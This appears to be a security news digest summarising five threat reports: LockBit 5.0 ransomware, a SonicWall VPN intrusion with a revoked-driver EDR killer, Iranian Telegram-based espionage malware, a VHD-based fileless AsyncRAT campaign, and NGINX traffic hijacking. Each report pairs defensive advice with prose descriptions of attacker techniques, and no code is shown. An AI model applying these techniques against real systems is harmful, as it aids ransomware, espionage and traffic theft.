Update: LockBit 5.0 Emerges as Cross-Platform Ransomware Targeting Windows, Linux, and ESXi Environments
Kaspersky has identified a new wave of LockBit 5.0 ransomware samples designed to operate across Windows, Linux, and VMware ESXi environments, reflecting a continued shift toward highly scalable, multi-platform ransomware operations. Analysis of 19 payloads reveals a shared core architecture paired with platform-specific logic, enabling the malware to interact efficiently with files, processes, and system utilities across platforms. The latest builds replace the group’s earlier AES-based encryption with the faster ChaCha20 stream cipher, enabling rapid encryption of large data sets while avoiding common cryptographic libraries that may trigger detection. At the time of analysis, at least one sample showed an extremely low detection rate, suggesting recent development or effective evasion techniques. The findings also align with broader reporting that LockBit is moving toward a cartel-style structure, collaborating with other ransomware groups to share infrastructure, affiliates, and operational playbooks. This model increases scale, resilience, and overall campaign tempo across multiple sectors. Technical analysis of the ESXi variant highlights the group’s continued focus on hypervisors as high-impact targets. The ransomware verifies it is running in an ESXi environment, enumerates active virtual machines, and forcibly powers them off before launching a multi-threaded encryption routine against virtual disk and configuration files. A two-stage encryption workflow begins with a fast, partial pass, then shifts to full encryption, allowing attackers to disrupt entire virtual infrastructures within a short execution window. Command-line flags provide operators with granular control over encryption percentage, execution timing, logging, and VM exclusions, reflecting a mature affiliate-driven deployment model. Anti-analysis checks targeting debugging tools, combined with self-deletion routines, are designed to hinder investigation and incident response. This focus on hypervisor-level attacks reinforces a broader trend in ransomware operations, in which adversaries target virtualization layers to simultaneously disrupt dozens or hundreds of enterprise systems in a single attack.
SonicWall VPN Intrusion Leads to Kernel-Level EDR Disruption via Revoked Driver Abuse
Security researchers at Huntress responded to a February 2026 intrusion in which threat actors gained initial access using compromised SonicWall SSLVPN credentials, then rapidly pivoted into internal reconnaissance and defense evasion. Authentication logs showed a denied portal login attempt from one IP, followed almost immediately by a successful VPN client connection from another, suggesting credential testing and rapid access establishment. Once inside, the attacker conducted aggressive network discovery, including ICMP sweeps, NetBIOS probes, and high-rate SMB SYN activity to map reachable systems. The intrusion followed a familiar ransomware precursor pattern, with credentialed access, lateral reconnaissance, and preparation for security control disruption. Analysts disrupted the activity before ransomware deployment, but the timeline reflects a structured attack chain designed to blind defenses and create conditions for follow-on impact. The attacker deployed a 64-bit EDR killer that used a BYOVD technique, abusing a legitimate but revoked EnCase forensic driver to terminate security processes from kernel mode. The malware concealed the driver using a wordlist-based substitution encoding scheme, allowing the payload to appear as benign text and evade static or entropy-based detection. Once decoded and loaded, the driver exposed kernel-level IOCTL functions that allowed the user-mode component to terminate processes belonging to major EDR and AV vendors, bypassing user-mode protections entirely. The driver’s signature, issued before Microsoft’s 2015 cutoff and timestamped while valid, allowed it to load despite the certificate being expired and revoked for more than a decade. This technique highlights a growing trend where ransomware operators rely on legitimate but vulnerable drivers to disable defenses before encryption or data exfiltration. Defenders should enable HVCI or Memory Integrity, deploy Microsoft’s vulnerable driver block rules, and implement attack surface reduction policies to prevent abused drivers from loading.
Update: Prince of Persia Activity Tied to Iranian Internet Blackout and Telegram-Based C2 Operations
SafeBreach researchers have uncovered new activity from the Iranian state-linked Prince of Persia threat actor, including infrastructure changes, a new Tornado malware variant, and a potential counter-attack against researchers. Between December 2025 and early February 2026, the group replaced all previously identified command-and-control servers, modified logging to obscure victim identities, and shifted its infection vector to a recent WinRAR vulnerability to improve compromise rates. Researchers also gained access to more than 2,000 exfiltrated files and historical Telegram-based C2 communications, revealing sustained espionage activity since early 2025. The threat actor demonstrated operational awareness by deleting communication logs, altering backend code, and introducing RSA-verified log structures to prevent spoofed victim submissions. Activity abruptly stopped on January 8, coinciding with a nationwide Iranian internet blackout, then resumed just before connectivity was restored, strengthening the assessment of direct state alignment. Organizations should monitor for unusual Telegram traffic, update systems against recent archive and Windows vulnerabilities, and block known indicators tied to the group’s infrastructure. Technical analysis also identified the Tornado v51 malware, which uses dual command-and-control mechanisms via HTTP and Telegram and employs a hybrid domain-generation approach that combines custom algorithms and blockchain-derived data. The malware installs via archive exploitation, establishes persistence through scheduled tasks, and communicates with C2 servers to exfiltrate system information or download secondary payloads. Researchers also observed a likely strike-back attempt in which the threat actor sent a malicious ZIP file disguised as exfiltrated data, delivering ZZ Stealer and a modified StormKitty infostealer. Similarities between this tooling and previous campaigns targeting open-source ecosystems suggest shared tradecraft or resource overlap with other Iranian-aligned threat clusters, including possible links to Educated Manticore and activity historically associated with APT33. The group’s use of Telegram for command delivery, data exfiltration, and infrastructure coordination demonstrates continued reliance on legitimate platforms to blend into normal traffic. Defenders should restrict unauthorized Telegram use in enterprise environments, monitor for suspicious archive execution or startup-folder persistence, and apply timely OS and application patches to reduce exposure to the group’s evolving intrusion techniques.
Dead#Vax Campaign Exploits VHD Containers and Fileless Script Chains for In-Memory RAT Deployment
Security researchers at Securonix have identified an advanced multi-stage malware campaign, dubbed Dead#Vax, that leverages trusted file formats, extreme script obfuscation, and fileless execution to evade traditional endpoint defenses. The intrusion chain begins with phishing emails delivering IPFS-hosted VHD files masquerading as business documents, allowing attackers to bypass Mark-of-the-Web protections once the disk image is mounted. Execution progresses through Windows Script Files, heavily obfuscated self-parsing batch scripts, and layered PowerShell loaders that decrypt payloads only at runtime. The final stage injects encrypted x64 shellcode directly into trusted, Microsoft-signed Windows processes, ensuring the malware never appears on disk in a recognizable form. Analysis confirmed the payload ultimately deploys a fully functional AsyncRAT implant capable of long-term surveillance and remote control. Organizations should restrict the use of disk image formats such as VHD and ISO from untrusted sources, enforce email and web controls for container-based downloads, and educate users about the risks of mounting unsolicited disk images. From a tradecraft perspective, Dead#Vax demonstrates deliberate design for stealth, stability, and reinfection control through memory-only execution and runtime deobfuscation. The loaders employ multi-layer string encryption, native Win32 API invocation via embedded C#, and marker-based memory scanning to avoid duplicate injections and reduce behavioral noise. By abusing legitimate Windows processes for execution and persistence, the campaign blends malicious activity into normal system behavior, complicating forensic reconstruction. The reliance on process injection, scheduled task-based persistence, and encrypted shellcode highlights a broader trend toward detection-resistant, script-centric malware frameworks rather than novel binaries. Defenders should prioritize PowerShell script block logging, monitor for injection-related Win32 API usage, deploy memory-level detection and hunting capabilities, and correlate multi-stage execution behavior rather than relying on single indicators.
NGINX Traffic Hijacking Campaign Targets Baota Panels and Asian TLD Infrastructure
Datadog has identified an active web traffic hijacking campaign targeting compromised NGINX servers and Baota (BT) management panels, primarily affecting Asian top-level domains and government or educational sites. The attackers modify legitimate NGINX configuration files by injecting malicious location blocks that intercept inbound web requests and route them through attacker-controlled backend servers. By abusing normal directives such as rewrite, proxy_pass, and proxy_set_header, the campaign preserves original request metadata, making the redirected traffic appear legitimate and difficult to detect. Targeting patterns show a focus on domains using TLDs, including [.]in, [.]id, [.]pe, [.]bd, [.]th, as well as [.]edu and [.]gov sites. The activity has been linked to actors previously associated with React2Shell exploitation, suggesting continued post-exploitation monetization or surveillance operations. The campaign uses a multi-stage automated toolkit to deploy and maintain malicious configurations across compromised servers. Initial scripts act as orchestrators that download additional payloads, while subsequent stages enumerate common NGINX configuration directories or Baota panel paths to inject domain-specific hijacking rules. Advanced scripts implement error handling, configuration testing with nginx -t, and controlled reloads to avoid service disruption, indicating mature operational tradecraft. A final stage scans compromised systems, builds a map of hijacked domains and proxy targets, and exfiltrates the results to an external command-and-control server. Because the attack relies on configuration abuse rather than software vulnerabilities, malicious behavior may persist unnoticed while sites continue functioning normally. Defenders should implement file integrity monitoring on NGINX configuration directories, restrict write permissions to trusted administrators, and audit proxy directives to detect and remove unauthorized traffic redirection.
